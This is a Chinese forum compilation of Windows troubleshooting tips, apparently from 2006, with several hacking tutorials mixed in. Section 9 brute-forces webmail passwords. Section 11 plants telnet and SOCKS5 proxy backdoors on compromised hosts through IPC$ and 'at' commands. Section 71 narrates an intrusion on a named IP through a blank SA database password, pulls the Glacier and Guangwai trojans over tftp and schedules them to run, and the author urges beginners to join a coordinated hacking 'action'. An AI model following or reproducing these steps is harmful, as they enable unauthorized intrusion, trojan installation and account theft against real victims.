(上面上传的srv和ntlm等东东还有一个简便方法,全都可以直接用流光工具菜单里的种植者上传,
60秒后自动运行,不用敲命令!呵呵~~~~方便吧!)
(9)如何用流光破解信箱密码
这次的目标是21CN,运行流光IV,选择POP3主机----右键----编辑----添加,填上:pop.21cn.com,
其他的就用默认吧!不用更改,确定就行了。到下一步,还是右键-----从列表中添加------
选择一个字典,没有的到网上下载一个字典,或者到黑白网络去下载,我们用简单模式探测!
这样速度比较快,然后就等着成果吧,上次我以下就破了5个邮箱出来。
(10)frontpage进行攻击
打开您自己的Frontpage,文件菜单下选择“打开站点”,然后在文件夹框里写入
http://127.0.0.1(http://不要漏掉)。按下“打开”按钮,一会后,出现了文件夹,成功了,
现在就可以操作网页文件了。如果跳出错误信息,表示有密码,我们用以下
http://127.0.0.1/_vti_pvt/service.pwd,这是默认的密码文件,下载下来,找个解密器破密码吧!
破出来后就还可以改网页。这个只能改该网页,没什么玩的。
(11)用肉鸡做SOCK5代理跳板
需要软件:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。
首先我们在命令提示符下建立IPC$管道:
net use \\127.0.0.1\ipc$ "密码" /user:帐号
通道建立好后,我们把srv.exe sss.exe ntlm.exe全部上传。
c:\copy srv.exe \\10.10.10.10\admin$
1 files copied!
c:\copy ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\copy sss.exe \\10.10.10.10\admin$
1 files copied!
复制完毕后,
看肉鸡上现在的时间:
c:\net time \\127.0.0.1
显示当前时间是 2002/4/13 晚上 09:00
我们来启动srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09:01后。我们来连接肉鸡:
c:\telnet 127.0.0.1 99
连上后显示:
c:\winnt\system32>
接着我们启动NTLM.exe
c:\winnt\system32>ntlm
显示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我们终止srv.exe的telnet服务:
C:\WINNT\system32>net stop telnet
继续:
C:\WINNT\system32>net start telnet
再启动TELNET。
OK,我们来登陆
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了,一切顺利,我们现在正式开始做代理:
c:>sss.exe -install <---------开始安装
显示:
c:>sksockserver installed!
来看看配置:
c:>sss -config show
显示:
SkServer Port = 1813 <----开放服务的端口 ,我们记着这个1813端口哦
SkServer StartType: 3 - Manual <---服务启动方式
SkServer Enable Client Set Num:0 <---客户端的项目个数
SkServer Pass SkServer Number:0 <---经过SkServer的项目个数
来启动服务:
c:>net start skserver
提示你正在启动,并且完成。
来检查一下是不是启动了:
c:>net start <-----------看看启动的服务列表
These Windows 2000 services are started:
Print Spooler
Server
Snake SockProxy Service <---------------就是它,呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.
c:>_
好了,到这里我们已经做好了一个socks5代理了,我们自己的哦.OK,下面我们用sockscap来使用我们
做代理。
安装好SocksCap后,我们在桌面上打开SocksCap V2,点开File选项选Settings...弹出卡片,在
SOCKS Server里面我们填肉鸡的IP:127.0.0.1,PortT填默认的1813端口,下面的我们选socks version 5,
呵呵,和 Attempt local then remot,这是域名解析的顺序,先本地,然后才远程。设置完了点“确定”
我们就可以使用了,添加应用程序到sockscap里面,点开那个"new"按钮,会弹出一个卡片,
Profile name :程序名,随便写。
Command Line: 命令行,点后面的Browse...找到你的程序路径
Working:填好上面那个,这个就自动加上.
这样我们就把程序加到SocksCap里面了。
现在们可以双击里面的程序来使用,也可以选住程序在点"Run"来运行。
好了,终于写完了,上面的内容都很简单,很适合初学者,还望高手们不好见笑,刚好听说这次5.1有很多联盟有所行动,希望上面的内容能教会一部分人,少走弯路,让更多的人参与这次行动。UNIX和LINUX由于自己的功力也还不够,还差很远,所以还不敢写。

六十七、黑屏的几个原因

(1)显示器断电,或显示器数据线接触不良;
(2)主板没有供电;
(3)显卡接触不良或损坏;
(4)CPU 接触不良;
(5)内存条接触不良;
(6)机器感染 CIH 病毒,BIOS 被破坏性刷新。

六十八、恢复“开始”菜单中的“运行”

  重庆读者飞翔来信:最近不知道执行了什么操作,我的电脑上“开始”菜单里的“运行”选项不见了,能不能帮我找回来啊?
  A:①如果安装的是Win98:打开注册表编辑器,找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”,把右边窗格中的双字节值“NoRun”修改为0或删除,然后注销重新登录即可恢复。②如果安装的是Win2000/XP:在任务栏上点击鼠标右键,选择“属性”,在“开始菜单→自定义→高级”里面可以设定是否出现运行选项。

六十九、计算机变慢的十大原因

 1、在开机时加载太多程序
  2、桌面上开启桌布
  3、没有定期清理硬磁盘和重组硬磁盘
  以下的,我就会很详细地说明一下如何加速计算机和令计算机慢的病征!解决七大常见影响计算机表现的原凶当计算机忽然慢下来时,你可能会怀疑自己是否做错了甚么而引致损害了计算机?其实不必太介怀,因为一个小小改变,都可能会影响到计算机运作表现,而且在使用计算机的过程中,无可避免地都会引起各种些微的改变。任何问题总有方法可以解决的,就让我细细道出七大常见影响计算机表现的原因,解决了它们之后,便可以安心享用计算机的高性能。
  4、删除常驻程序
  何谓常驻程序呢?常驻程序就是在开机时加载的程序,而那些程序就叫做常驻程序。常驻程序不但拖慢开机时的速度,而且更快地消耗计算机资源以及内存,但你可能会问:那些程序全都有用的耶!那我可以答你的就是:你想要那些有用的程序来牺牲速度,还是不要那些程序来回复速度呢?自己想一想吧!一般来说,如果想删除常驻程序,可去\"启动\"清单中删除,但如果想详细些,例如是icq、popkiller 之类的软件,是不能在\"启动\"清单中删除的,要去\"附属应用程序\",然后去 \"系统工具\",再去\"系统信息\",进去后,按上方工具列的\"工具\",再按\"系 统组态编辑程序\",进去后,在\"启动\"的对话框中,就会详细列出在启动电 脑时加载的常驻程序了!
  5、桌面上不要摆放桌布和关闭activedesktop
  不知大家有否留意到,我们平时一直摆放在桌面的桌布,其实是很浪费计算机资源的!不但如此,而且还拖慢计算机在执行应用程序时的速度!本想美化桌面,但又拖慢计算机的速度,在这时,你是否会有一种\"不知怎样\"的感觉呢?还有一点,不知大家有否试过,就是当开启桌布时,每逢关闭一个放到最大的窗口时,窗口总是会由上而下、慢慢、慢慢地落,如果有这种情况出现,你必须关闭桌布!方法是:在桌面上按鼠标右键,再按内容,然后在\"背景\"的对话框中,选\"无\",建议在\"外观\"的对话框中,在桌面预设的青绿色,改为黑色......至于关闭activedesktop,即是叫你关闭从桌面上的web画面,例如在桌面上按鼠标右键,再按内容,然后在\"背景\"的对话框中,有一幅桌布,名为windows98,那副就是web画面了!所以千万不要开启。依我所说,布只可拿四个字来形容,就是\"红颜祸水\"!
  6、删除一些不必要的字型
  系统运行得慢的其中一个原因,就是字型多少的关系!安装的字型愈多,就占用愈多的内存,从而拖慢计算机的速度!所以我们要删除一些不必要的字型。要删除一些不必要的字型,你可到控制台,再进去一个叫\"字型\"的数据夹,便可删除字型,但,要怎样才知道,那些字有用,那些字没用呢?例如:如果你不常到 ms_dos模式的话,就删除dos 字型!因为各个人都可能喜爱某种字型,所以我也不能确定要删除那些 字型,不过我在此,有个秘决教你,如果你有华康粗黑字型,且又有新 细明体的字型,建议你删除华康粗黑字型,如果你有新细明体,且又有细明体,就删除细明体吧!
  7、定期重组硬磁盘
  计算机硬盘中最细小的单位是扇区,一个档案通常会占用若干扇区,每当硬盘用久了,无数次的新增、更改和删除档案后,就会造成很多断断续续的扇区,因而非连续性的档案便会愈来愈多,硬盘磁头便需要花更多时间跳来跳去来读取数据,这就导致硬盘速度减慢。有见及此,windows才会有\"重组磁盘\"出现。只要执行\"重组磁盘\",所有非连续性的档案都会被重新编排得整整齐齐,至于执行时间,大约一星期左右执行一次便可了。
  8、设定虚拟内存
  硬盘中有一个很宠大的数据交换文件,它是系统预留给虚拟内存作暂存的地方,很多应用程序都经常会使用到,所以系统需要经常对主存储器作大量的数据存取,因此存取这个档案的速度便构成影响计算机快慢的非常重要因素!一般win98预设的是由系统自行管理虚拟内存,它会因应不同程序所需而自 动调校交换档的大小,但这样的变大缩小会给系统带来额外的负担 ,令系统运作变慢!有见及此,用家最好自定虚拟内存的最小值和最大值,避免经常变换大小。要设定虚拟内存,在\"我的计算机\"中按右键,再按内容,到\"效能\"的对话框中,按\"虚拟内存\",然后选择\"让自已设定虚拟内存设定值\",设定\"最小值\"为64,因为我的计算机是32mbram,所以我就设定为64,即是说,如果你的内存是64mbram,那在\"最小值\"中,就设为128。顺带一提,在\"效能\"的对话框中,选择\"档案\",将原先设定的\" 桌上型计算机\",改为\"网络服务器\",是会加快系统运作的;还有,在\"磁盘\"的对话框中,不要选\"每次开机都搜寻新的磁盘驱动器\",是会加快开机速度的!
  9、更改开机时的设定
  虽然你已知道了如何新增和移除一些常驻程序,但你又知不知道,在开机至到进入win98的那段时间,计算机在做着什么呢?又或者是,执行着什么程序呢?那些程序,必定要全部载完才开始进入win98,你有否想过,如果可删除一些不必要的开机时的程序,开机时的速度会否加快呢?答案是会的!想要修改,可按\"开始\",选\"执行\",然后键入win.ini,开启后,可以把以下各段落的内容删除,是删内容,千万不要连标题也删除!它们包括:[compatibility]、[compatibility32]、[imecompatibility]、[compatibility95]、[modulecompatibility]和。
  10、彻底删除程序
  大家都知道,如果想移除某些程序,可到\"新增/移除程序\"中移除,但大家又知不知道,它只会帮你移除程序,而不会帮你移除该程序的注册码和一些登录项目呢?这不是win98蠢,而是它在这方面不够专业,要彻底删除程序,要找回些\"专业\"删除软件来移除才成事!先前symantec公司出品的nortonuninstall(以下简称为nud),因为有某部份破坏了某些删除软件的版权,故此全世界已停止出售,正因如此,symantec才出了cleansweep(以下简称为cs),不过论功能上,还是nud更胜一寿!言归正传,其实除了这两个软件外,还有很多同类软件都能有效地移除程序,既然nud已绝版,那我就说cs吧。下载并安装后,如果你想移除程序,只要用cs来移除,它便会一拼移除该程序的登录项目和注册码!我在此帮\"新增/移除程序\"改了个别名,就是\"新增垃圾、移除程序\"!垃圾是指被遗弃的登录项目和注册码,程序就是程序啰!

七十、加快软驱传输速度

  可以通过修改系统注册表以获得较高的数据传输速度。具体方法如下:打开系统注册表编辑器,找到“HEKY_LOCAL_MACHINE\System\CurrentControlset\Services\Class\FCD\000”,在右边的窗口空白处,点击鼠标的右健新建一个“DWORD”值,命名为“Fore-Fifo”,健值设定为“0”。最后关闭注册表编辑器,重新启动电脑,一切就OK了
级别: 光盘中级
发帖
1140
飞翔币
335
威望
303
飞扬币
8460
信誉值
0
只看该作者 4 发表于: 2006-12-28
七十一、简单入侵

看看这主机是否是网站先,用IE打开它的IP:61。170。168。168,出现“该页无法显示”。看来这主
机还没WEB网页。祭起我的“X-SCAN”宝刀,全面扫描一下它的各种漏洞,我就不信他没有漏洞!
(玩黑必备一:眼睛长到头顶上)
X-SCAN扫描结果报告:
“端口开放:1433、3389
ASP 漏洞:don't find CGI漏洞: don't find IIS漏洞don't find……,SQL:SA /NULL”
呵呵,大局已定,大家看到了有哪些漏洞吗?什么,你不懂鸟语?哇噻,你先去补习鸟语再到我这来!
对了,我们的白灵、流二位大虾精通由各种乱码加鸟语组成的火星ASP语言,听说二位不日将移民火星,
你趁他们还在地球快去拜师学艺啊!
再接着卖我的黄婆烂瓜……
3389——我得最爱!利用远程主机打开的远程控制功能(通过3389连接)进入它的WINDOWS图形界面,
这种感觉对我等菜鸟来说可不是DOS破界面能比的哦~~
废话少说,打开我的“WINDOW2000远程客户程序”,填IP、点“联接”~~啊?连不上!再连~~还是不行
!55555……输入法漏洞是玩不成了。
一招不行再换一招!点根烟先……打开“天行网络”所制的精品软件——SQLEXEC,填上IP,用户名:
SA,密码为空,点“连接”---“:(连接成功!”
进来了,谈笑间我就进来了,我真厉害~~(玩黑必备二:自夸不怕吓死人)。先看看它的C盘的文件:
DIR C:,OK!这机子装的是WINNT,怪不得我用WIN2000的远程客户程序连不上,可是它怎么会打开
WIN2000的远程连接用端口-3389端口呢?
算了,越想越乱,忙我的正事吧。
为安全起见,让我看看它建立了哪些连接进程:“netstat -n”……哈,反馈回来的信息都是一些
196开头的IP,没开TTY监听,这该不会是个局域网的服务器吧?
再来看看我现在的权限有多少:“net user aaa 1234 /add”---“成功建立新用户”。呵呵,
权限还不小,能建新用户哦~~由于我机子用的是WIN98,所以没法用这新建的用户名为AAA,密码
为1234的帐户进行连接,这帐户对我来说根本
没用……
现在,我们即将开始取得远程主机的最最最……大权限!啥?你不信?呵呵,说你菜你还不高兴,
听说过木马吗?听说过大名鼎鼎专玩木马的“符号”大虾吗?哦,你不知木马只知符大虾……行,
赶明儿我让符大虾在你机子里也放个木马,这样你就
能深刻理解啥叫木马了~~
继续攻击……我们现在就要上传个木马到远程主机。木马“广外女生”现在国内很流行,前几天也
曾去黑网下栽了一个,它的被控端程序才90K,上传比较容易,就用它做远程主机的“后门”吧。1。
打开TFTP(一个能把你的PC变成FTP服务器的小程序)——
2。把“广外女生”的被控端程序gw.exe复制到我的C盘TFTP默认文件路径下。3。在远程主机里输入
命令:"tftp -i xx.xx.xx.xx get gw.exe c:\gw.exe"
5分钟后,GW。EXE已乖乖在躺在远程主机的C盘里了~~~
现在,得想法子运行GW。EXE:1。打入命令"net time"---远程主机反馈当前时间"09:35"。 2.打入
程序起动时间命令"at 09:37 c:\gw.exe"(GW在9:37运行)——出现主机反应:“建立一个新任务,
ID=1”
OK!二分钟后将运行我的“广外女生”了!
打开我的“广外”控制端程序,在主机查找栏里填上“61.170.168.160---61.171.168.170”,点
“查找”。扫描很慢……别急……扫完了……啊?!在这扫描的IP端里无中“奖”主机!怪事啊!
是远程主机的“广外”没有运行还是我对这控制端程序的操
作错误?一定是这破“广外”本身程序不行,太烂了~~(玩黑必备三:一切都不是我的错!)。
看来,今天我只得请出封存已久的国货精品木马——“冰河”了。我的“冰河2。2”的被控端有200
多K,估计上传时间会很久,但如果上传成功,它的功能可不是“广外”所能与之并论的啊!另外,
对冰河的界面操作也不会似“广外”那嚒陌生……
言归正传,现在开始上传“冰河”:“tftp -i xx.xx.xx.xx get G-server.exe c:\inetpub\GG.exe"
(为不至于太过醒目,这次把文件传到C盘的INETPUB文件包下)
缓慢上传中……让我再点根烟,趁这功夫去“黑白网络”的技术论坛逛逛去……
已过25分钟了,进远程主机瞧瞧是否已下栽成功了~~OK!冰河已在那里了。接着:“net time”,
反馈信息:10:30”。“at 10:32 c:\inetpub\GG.exe”,反馈信息“运行新任务,ID=1”
二分钟后,打开“冰河”控制端,加入远程主机IP,连接……成功!接着再:添加服务器端连接密码、
添加冰河运行自动通知发往信箱、删除“广外”、“冰河”被控端程序。
……
现在,这主机的一切已尽在我眼前了,真爽啊!明天,我也许会把一个SOCK5代理的服务器端程序放进
这主机,大家以后要是想用SOCK5代理,又懒得去漫无目标的查找的话,请找我,我会把我这个人专用
“肉机”贡献出来的。

七十二、A盘不见的解决方法

1、先检查硬件,连线是否正确、完好;
2、检查在BIOS中禁用了软盘驱动器,在“Standard CMOS Features”中,发现“Drive A”是否被设置成了“NONE”?
3、“开始”---“运行”---输入“gpedit.msc”运行组策略,在“用户配置---管理模板---Windows组件---资源管理器”右侧窗口中,找到“隐藏‘我的电脑’中这些指定的驱动器”,双击,
在属性框中检查是否将“未配置”设为“已启用”了;
在下拉菜单中是否选择了“仅限制驱动器A和B”;

七十三、EXE文件关联丢失的解决方法

1、修改regedit.exe 为 regedit.com
2、HKEY_CLASSES_ROOT\exefile\shell\open\command下的default,键值为"%1" %*。
另外,exe程序关联问题,在注册表下的HKEY_LOCAL_MACHINE\Software\Microsoft\windowsNT\currentVersion\winlogon
下面有个名为shell的子项,键值应为explorer.exe。

七十四、IE无法打开二级链接

IE新建窗口模块被破坏所致,需要重新注册几个动态链接文件。
点击:开始---运行---重新注册(输入)以下DLL文件。(一个一个依次注册)
regsvr32 Actxprxy.dll
regsvr32 Shdocvw.dll
重启系统,不行再添加以下的DLL文件。
regsvr32 Mshtml.dll
regsvr32 Urlmon.dll
regsvr32 Msjava.dll
regsvr32 Browseui.dll
regsvr32 Oleaut32.dll
regsvr32 Shell32.dll
另:msjava.dll是JAVA虚拟机的动态连接库,提示找不到模板是因为你的机子没装虚拟机,所以这个文件,你可以不必注册的。

七十五、IE浏览器常见经典故障

  当你驾着心爱的IE在Internet上纵横驰骋时,突然桌面上弹出一个莫名其妙的警告提示框,紧接着所有IE窗口全部关闭;或无论如何点击链接,IE始终没有反应……这些故障让人心烦意乱,无可奈何。不过你也不用手足无措,今天我们就一起将IE常见错误揪出来,并彻底消灭!

  1.发送错误报告

  【故障现象】在使用IE浏览网页的过程中,出现“Microsoft Internet Explorer遇到问题需要关闭……”的信息提示。此时,如果单击“发送错误报告”按钮,则会创建错误报告,单击“关闭”按钮之后会引起当前IE窗口关闭;如果单击“不发送”按钮,则会关闭所有IE窗口。



  【故障点评】这是IE为了解用户在使用中的错误而设计的一个小程序,不过我可不想当微软的“免费测试员”,更何况每天它都会面对成千上万的报告,谁知道有没有在意我的报告问题呢?!

  【故障解决】

  针对不同情况,可分别用以下方法关闭IE发送错误报告功能:

  ①对IE 5.x用户,执行“控制面板→添加或删除程序”,在列表中选择“Internet Explorer Error Reporting”选项,然后单击“更改/删除”按钮,将其从系统中删除。

  ②对Windows 9x/Me/NT/2000下的IE 6.0用户,则可打开“注册表编辑器”,找到[HKEY_LOCAL_MACHINE\Software \Microsoft\Internet Explorer\Main],在右侧窗格创建名为IEWatsonEnabled的DWORD双字节值,并将其赋值为0。

  ③对Windows XP的IE 6.0用户,执行“控制面板→系统”,切换到“高级”选项卡,单击“错误报告”按钮,选中“禁用错误报告”选项,并选中“但在发生严重错误时通知我”,最后单击“确定”按钮。



  2.IE发生内部错误,窗口被关闭

  【故障现象】在使用IE浏览一些网页时,出现错误提示对话框:“该程序执行了非法操作,即将关闭……”,单击“确定”按钮后又弹出一个对话框,提示“发生内部错误……”。单击“确定”按钮后,所有打开的IE窗口都被关闭。

  【故障点评】该错误产生原因多种多样,内存资源占用过多、IE安全级别设置与浏览的网站不匹配、与其他软件发生冲突、浏览网站本身含有错误代码……这些情况都有可能,需要耐心加以解决。

  【故障解决】

  ①关闭过多的IE窗口。如果在运行需占大量内存的程序,建议IE窗口打开数不要超过5个。

  ②降低IE安全级别。执行“工具→Internet选项”菜单,选择“安全”选项卡,单击“默认级别”按钮,拖动滑块降低默认的安全级别。



  ③将IE升级到最新版本。IE 6.0下载地址:http://download.sina.com.cn/cgi-bin/detail.cgi?s_id=6041。IE 6.0 SP1下载地址:download.microsoft.com。

  可使用以IE为核心的浏览器,如MyIE2。它占用系统资源相对要少,而且当浏览器发生故障关闭时,下次启动它,会有“是否打开上次发生错误时的页面”的提示,尽可能地帮你挽回损失。下载地址:http://download.sina.com.cn/cgi-bin/detail.cgi?s_id=8012。

  3.出现运行错误

  【故障现象】用IE浏览网页时弹出“出现运行错误,是否纠正错误”对话框,单击“否”按钮后,可以继续上网浏览。

  【故障点评】可能是所浏览网站本身的问题,也可能是由于IE对某些脚本不支持。

  【故障解决】

  ①启动IE,执行“工具→Internet选项”菜单,选择“高级”选项卡,选中“禁止脚本调试”复选框,最后单击“确定”按钮即可。

  ②将IE浏览器升级到最新版本。

  4.IE窗口始终最小化的问题

  【故障现象】每次打开的新窗口都是最小化窗口,即便单击“最大化”按钮后,下次启动IE后新窗口仍旧是最小化的。

  【故障点评】IE具有“自动记忆功能”,它能保存上一次关闭窗口后的状态参数,IE本身没有提供相关设置选项,不过可以借助修改注册表来实现。

  【故障解决】



  ①打开“注册表编辑器”,找到[HKEY_ CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old WorkAreas],然后选中窗口右侧的“OldWorkAreaRects”,将其删除。

  ②同样在“注册表编辑器”中找到[HKEY_CURRENT_USER\Software \Microsoft\Internet Explorer\Main],选择窗口右侧的“Window_Placement”,将其删除。

  ③退出“注册表编辑器”,重启电脑,然后打开IE,将其窗口最大化,并单击“往下还原”按钮将窗口还原,接着再次单击“最大化”按钮,最后关闭IE窗口。以后重新打开IE时,窗口就正常了!

  5.IE无法打开新窗口

  【故障现象】在浏览网页过程中,单击超级链接无任何反应。

  【故障点评】多半是因为IE新建窗口模块被破坏所致。

  【故障解决】单击“开始→运行”,依次运行“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”将这两个DLL文件注册,然后重启系统。如果还不行,则可以将mshtml.dll、urlmon.dll、msjava.dll、browseui.dll、oleaut32.dll、shell32.dll也注册一下。

  6.脱机却无法浏览本机上的网页

  【故障现象】通过IE的“脱机浏览”功能,我们差不多能浏览所有已经下载到本地硬盘的网页内容,这对拨号上网的用户来说更是省钱的一大法宝。但有时,目标网页虽然在硬盘上,但是却提示“无法浏览”。

  【故障点评】这多半是由于你修改了系统时间,引起了IE历史记录的错乱。

  【故障解决】



  ①可用直接在“临时文件夹”中搜索的方法来激活它。按下Win+F,在“包含文字”处输入部分记忆中的关键字,在“搜索”处按“浏览”按钮选择IE临时文件夹的地址,如“C:\WINDOWS\Temporary Internet Files”,单击“开始查找”,在结果列表里双击目标页打开。

  ②可以尝试用腾讯的TE等浏览器来脱机浏览。

  7.联网状态下,浏览器无法打开某些站点

  【故障现象】上网后,在浏览某些站点时遇到各种不同的连接错误。

  【故障点评】这种错误一般是由于网站发生故障或者你没有浏览权限所引起。

  【故障解决】针对不同的连接错误,IE会给出不同的错误信息提示,比较常见的有以下几个:

  ①提示信息:404 NOT FOUND这是最为常见的IE错误信息。主要是因为IE不能找到你所要求的网页文件,该文件可能根本不存在或者已经被转移到了其他地方。

  ②提示信息:403 FORBIDDEN常见于需要注册的网站。一般情况下,可以通过在网上即时注册来解决该问题,但有一些完全“封闭”的网站还是不能访问的。

  ③提示信息:500 SERVER ERROR通常由于所访问的网页程序设计错误或者数据库错误而引起,你只有等待对方网页纠正错误后再浏览了:-(。

  小渔收集了一个IE错误代码大全,大家在遇到IE错误提示信息,但是搞不清楚的时候,可以去这里查阅:http://www.cfan.com.cn/09net/19ie.htm。

  8.IE无法重新安装

  【故障现象】IE不能正常使用,在重装时却提示“发现系统中有该版本的IE”而拒绝安装;“添加或删除程序”中又没有卸载选项。

  【故障点评】“重装”是解决IE故障的“终极大法”,也是初级用户的法宝。



  【故障解决】

  ①对IE 5.0的重装可按以下步骤进行:

  第一步:打开“注册表编辑器”,找到[HKEY_LOCAL_ MACHINE\Software\Microsoft\Internet Explorer],单击其下的Version Vector键。

  第二步:在右侧窗格中双击IE子键,将原来的“5.0002”改为“4.0”,单击“确定”后退出“注册表编辑器”。

  第三步:重启后,就可以重装IE 5.0了。

  ②IE 6.0的重装有两种方法:

  方法1:打开“注册表编辑器”,找到[HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}],将IsInstalled的DWORD值改为0就可以了。

  方法2:放入Windows XP安装盘,在“开始→运行”窗口键入“rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%\Inf\ie.inf”。

七十六、解决NTFS下Win2000密码丢失

  第一步,网站下载NTFSDOS Professional软件(下载地址:http://www.winternals.com),下载后进行安装,安装后执行NTFSDOS Professional Boot Disk Wizard程序,根据向导,会提示依次插入两张软盘,其实能用到的就是第一张。
  第二步,用Win98软盘或光盘启动盘启动机器到DOS状态,然后插入已经做好的NTFSDOS软盘第一张,执行Ntfspro.exe文件,它会开始自动分析当前硬盘分区表,如果有NTFS分区信息,然后就会依次列出每个NTFS分区的盘符(如果此时有机器的报警声响,请不要惊慌,因为此时可能是在你的某个NTFS分区的根目录有中文的目录存在,在DOS中它可能被认为是非法目录)。
  第三步,也就是清除Win2000用户口令。在DOS状态进入WinNT所在的盘符,一般为C区。进入%root%\system32\config目录(%root%指WinNT所在的分区路径),手动删除SAM文件,这样就可以把Win2000所有用户口令清除了。
  第四步,只需热启动机器,回车就可以正常进入Win2000了。

七十七、解开被锁定的.reg与.inf文件

  一、如果注册表编辑器未被锁定,可进入注册表编辑器,手动修改如下键值
  找到[HKEY_LOCAL_MACHINE\Softe\CLASSES\.reg],将右边窗口中的“默认”字符串的值修改为“REGFILE”;
  找到[HKEY_LOCAL_MACHINE\Software\CLASSES\.inf],将右边窗口中的“默认”字符串的值修改为“INFFILE”;
  二、如果注册表编辑器已被锁定
  1.用VBS文件解锁:
  打开记事本录入以下内容:
  Dim A
  Set A=CreateObject("WScript.Shell")
  A.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools","00000000","REG_DWORD"
  A.RegWrite"HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\","regfile"
  A.RegWrite"HKEY_LOCAL_MACHINE\Software\CLASSES\.inf\","inffile"
  输入完成后另存为UNLOCK.VBS,双击执行即可。
  2.用JS文件解锁:
  打开记事本录入以下内容:
  VAR:A=WScript.CreateObject("WScript.Shell")
  A.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools","00000000","REG_DWORD");
  A.RegWrite ("HKEY_LOCAL_MACHINE\Software\CLASSES\.reg\","regfile");
  A.RegWrite ("HKEY_LOCAL_MACHINE\Software\CLASSES\.inf\","inffile");
  输入完成后另存为UNLOCK.jS,双击执行即可。 (辽宁 乔珊)
  1.在DOS下使用Regedit
  其实DOS下也可以解除这种锁定的。编辑好上面的文件后,点击“开始→程序→MS-DOS方式”,来到MS-DOS方式下,输入regedit c:\unlcok.reg,按回车。接着画面上会出现“您确定要增加c:\unlock.reg信息到注册表”的对话框,按“确定”按钮,unlock.reg的内容就输入注册表了。
  2.利用.htm文件
  打开记事本,输入下面的内容:
  <html>
  <body>
  <script language="JavaScript">
  var shl=new ActiveXObject("Wscript.shell");
  shl.RegWrite("HKLM\Software\CLASSES\.reg",regfile,"REG_SZ");
  shl.RegWrite("HKLM\Software\CLASSES\.inf",inffile,"REG_SZ");
  </script>
  </body>
  </html>
  保存为.htm文件,运行这个文件就可以解除锁定。
  3.利用超级兔子魔法设置
  运行超级兔子魔法设置,点击“安全与多用户”选项,再点击“安全”标签,将“禁止使用.reg文件”和“禁止使用.inf文件”前面的“√”取消,就可以解除这种锁定。
  4.利用scanreg文件
  在纯DOS下输入scanreg/restore命令,目的是恢复以前备份的注册表,如果你以前备份的注册表是没有锁定的,那么试试这招也很有用的。或者在纯DOS环境下输入命令scanreg,用Tab键选择“START”,进入后选择“View Backups”,即查看备份文件,根据日期选择最新的备份,然后选择RESTORE,这样注册表就可以恢复正常了。 


七十八、Windows98不能正常关机解决法

你的Windows98不能正常关闭?老是在你执行了“开始——关闭系统——关闭计算机——确定”后,就停留在关机画面上不动弹了?你只好采取强行关机——“切断电源”?别!朋友,这样会“伤机”的!那到底该怎么办呢?请你别着急,跟我来吧!
一、试试“禁用快速关机”
大家知道,快速关机是Windows98中的新增功能,它可以大大减少关机的时间。但是,该功能与某些硬件不兼容,如果计算机中安装了这些硬件,可能会导致计算机停止响应,使你的Windows98不能正常关闭。那么我们就禁用快速关机:
1.点击“开始——运行”,在“打开”框中键入“msconfig”,然后单击“确定”;
2.点击“高级”,选中“禁用快速关机”复选框,点击“确定”,然后再次“确定”;
3.这时系统将提示重新启动计算机,请重新启动你的计算机;
4.重新启动计算机后再次关闭计算机,等候关机。如果计算机能够正常关机,则快速关机功能可能与计算机上所安装的多个硬件设备不兼容,你可以与计算机上所安装设备的供应商联系。
二、检查AMP(高级电源管理)功能
1.点击“开始——设置——控制面板”,然后双击“系统”;
2.在“设备管理器”选项卡上,双击“系统设备”;
3.双击设备列表中的“高级电源管理”,再点击“设置”选项卡,然后清除“启用电源管理”复选框;
4.点击“确定”;
5.重启动计算机;
6.关闭计算机,如果计算机正常关机,则问题可能在于APM。请关闭“高级电源管理”功能。
三、退出Windows声音文件
1.点击“开始——设置——控制面板——声音”;
2.在“事件”框中,点击“退出 Windows”;
3.在“名称”中,选中(无);
4.单击“确定”;
5.关闭计算机。
此时如果你的Windows98能够正常关闭,则问题是由退出声音文件所引起的。要解决这一问题,你可以从备份中恢复声音文件或重新安装提供声音文件的程序,也可以将Windows98配置为不播放“退出Windows”声音文件即可。
四、检查“启动”文件夹
通过检查“启动”文件夹来确定“启动”文件夹中的程序是否与启动过程冲突:
1.点击“开始——运行”;
2.在“打开”框中,键入“msconfig”,然后单击“确定”;
3.选中“装载启动组项目”复选框;
4.点击“确定”;
5.此时系统将提示重新启动计算机时,请“确定”。
如果计算机无法正常启动或关闭,则问题可能在于从“启动”文件夹中所加载的程序,将其清除即可。
五、检查Config.sys和Autoexec.bat文件
1.点击“开始——运行”, 在“打开”框中,键入“msconfig”,然后单击“确定”;
2.选择“诊断启动”项;
3.点击“确定”。
此时系统将提示重新启动计算机,请点击“确定”。如果计算机的启动或关闭不正确,那么就请你按下面方法来确定问题是由Config.sys还是Autoexec.bat文件中的哪一行所引起的冲突故障:
重新启动计算机,启动时,按住Ctrl键,从“Startup”菜单中选择“SafeMode”;
点击“开始——运行”;
在“打开”框中,键入“msconfig”,然后单击“确定”;
点击清除Config.sys和Autoexec.bat选项卡中不含Windows图标行的复选框,使用此Config.sys文件,点击启用某行;
点击“确定”,重新启动计算机。如果计算机的启动和关闭都很正常,启用另一行,并重复步骤4、5的爱作。
就这样逐步启用Config.sys文件和Autoexec.bat文件中的行,直到发现问题为止。哪行有问题就对症下药地处理那一行!
六、检查内部系统问题   
1.点击“开始——运行”;
2.在“打开”框中,键入“msconfig”,然后点击“确定”;
3.再点击“高级”,清除“高级疑难解答设置”中的“禁用系统ROM中断点”、“禁用虚拟HDIRQ”和“EMM不包含A000_FFFF”复选框,然后点击“确定”;
4.重新启动你的计算机。
此时如果你的计算机正常启动,请重复以上步骤,然后在步骤3中选中某一复选框。重复此过程,直到发现计算机无法正常启动为止。
